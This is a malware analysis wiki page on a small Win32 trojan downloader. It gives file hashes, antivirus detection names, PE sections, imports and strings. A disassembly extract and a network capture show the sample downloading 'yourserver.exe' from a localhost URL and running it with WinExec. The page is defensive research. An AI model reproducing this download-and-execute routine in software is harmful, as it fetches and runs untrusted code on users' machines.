818da150dbbc8fd3a34d445c1dbd8816

From aldeid
Jump to: navigation, search

Description

Summary

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Identification

MD5 818da150dbbc8fd3a34d445c1dbd8816
SHA1 3532e4bda622f4b7880366b9c70c0950513fdde6
SHA256 8cbc30b6fa05883d80a94183f7f0740fd1492c61f0cccbfe91ebb4c2e7b24274
ssdeep 12:e9GSGyzzrWtAz4ZbdSEMBmgfvZSbWKfLLz:e9GSFzr7KbrMBX3ZSW4P
imphash 8ad542ab16383a3043ad871c51ebd78e
File size 1.0 KB ( 1024 bytes )
File type Win32 EXE
Magic literal PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Antivirus detection

Antivirus Result Update
AVG Downloader.Multidl 20140225
Ad-Aware Generic.Malware.dld!!.EFB8232A 20140226
Agnitum Trojan.DL.MultiDL!oAVKSKI929o 20140225
AhnLab-V3 Trojan/Win32.Xema 20140225
AntiVir TR/Downloader.Gen 20140226
Antiy-AVL Trojan[Downloader]/Win32.MultiDL 20140226
Avast Win32:MiniMal [Trj] 20140226
Baidu-International Trojan.Win32.MultiDL.aZ 20140226
BitDefender Generic.Malware.dld!!.EFB8232A 20140226
Bkav W32.EloradoKK.Worm 20140225
CAT-QuickHeal TrojanDownloader.MultiDL.23 20140226
CMC Generic.Win32.818da150db!MD 20140220
Commtouch W32/Downloader-Sml!Eldorado 20140226
Comodo TrojWare.Win32.TrojanDownloader.MultiDL.23 20140226
DrWeb Trojan.Aphex 20140226
ESET-NOD32 Win32/TrojanDownloader.MultiDL.23 20140226
Emsisoft Generic.Malware.dld!!.EFB8232A (B) 20140226
F-Prot W32/Downloader-Sml!Eldorado 20140226
F-Secure Generic.Malware.dld!!.EFB8232A 20140226
Fortinet W32/Webdl.23!tr 20140226
GData Generic.Malware.dld!!.EFB8232A 20140226
Ikarus AdvHeur 20140226
Jiangmin TrojanDownloader.MultiDL.23 20140226
K7GW Trojan-Downloader ( 000077a11 ) 20140225
Kaspersky Trojan-Downloader.Win32.MultiDL.23 20140226
Kingsoft Win32.Troj.MultiDL.23.(kcloud) 20140226
McAfee Downloader-AE 20140226
McAfee-GW-Edition Downloader-AE 20140226
MicroWorld-eScan Generic.Malware.dld!!.EFB8232A 20140226
Microsoft TrojanDownloader:Win32/MultiDL.2_3 20140226
NANO-Antivirus Trojan.Win32.MultiDL.hkbi 20140226
Norman Downloader 20140224
Panda Trojan Horse 20140225
Qihoo-360 Win32/Trojan.2ff 20140226
Rising PE:Trojan.DL.Multidl.23!1073769335 20140226
Sophos Troj/DownLdr-AE 20140226
Symantec Downloader.Trojan 20140226
TheHacker Trojan/Downloader.MultiDL.23 20140226
TotalDefense Win32/DlQroj.23 20140225
TrendMicro TROJ_AE.AD 20140226
TrendMicro-HouseCall TROJ_AE.AD 20140226
VBA32 TrojanDownloader.MultiDL 20140225
VIPRE Trojan-Downloader.Win32.Small!cobra (v) 20140226
nProtect Trojan-Downloader/W32.MultiDL.1024 20140225
ByteHero 20140226
ClamAV 20140226
K7AntiVirus 20140225
Malwarebytes 20140226
SUPERAntiSpyware 20140226
ViRobot 20140226

Downloader capabilities

As depicted on the following assembly extract, the malware downloads an executable from localhost and saves it to c:\windl32.com. Then it executes it (WinExec).

.text:004010E3                 public start
.text:004010E3 start           proc near               ; CODE XREF: .text:004010AC�j
.text:004010E3                 push    0               ; LPBINDSTATUSCALLBACK
.text:004010E5                 push    0               ; DWORD
.text:004010E7                 push    offset CmdLine  ; "c:\\windl32.com"
.text:004010EC                 push    offset aHttp127_0_0_1W ; "Http://127.0.0.1/webdl/yourserver.exe"
.text:004010F1                 push    0               ; LPUNKNOWN
.text:004010F3                 call    URLDownloadToFileA
.text:004010F8                 push    0               ; uCmdShow
.text:004010FA                 push    offset CmdLine  ; "c:\\windl32.com"
.text:004010FF                 call    WinExec
.text:00401104                 push    0               ; uExitCode
.text:00401106                 call    ExitProcess
.text:00401106 start           endp

Dynamcic analysis

Network indicators

HTTP request

GET /webdl/yourserver.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: 127.0.0.1
Connection: Keep-Alive
Cookie: s_pers=%20s_fid%3D3E7C4746FF9393D9-0B79608B28879893%7C1447098463237%3B%20s_vs%3D1%7C1384028263237%3B%20s_nr%3D1384026463237-New%7C1415562463237%3B

Files

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Registry keys

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Mutexes

Incomplete.png
INCOMPLETE SECTION OR ARTICLE
This section/article is being written and is therefore not complete.
Thank you for your comprehension.

Static analysis

Sections

Name       VirtAddr     VirtSize     RawSize      Entropy     
--------------------------------------------------------------------------------
.text      0x1000       0x11e        0x200        2.842716

IAT

KERNEL32.dll

  • ExitProcess
  • WinExec

urlmon.dll

  • URLDownloadToFileA

Strings

ExitProcess
WinExec
KERNEL32.dll
URLDownloadToFileA
urlmon.dll
5Http://127.0.0.1/webdl/yourserver.exe
c:\windl32.com


Comments

blog comments powered by Disqus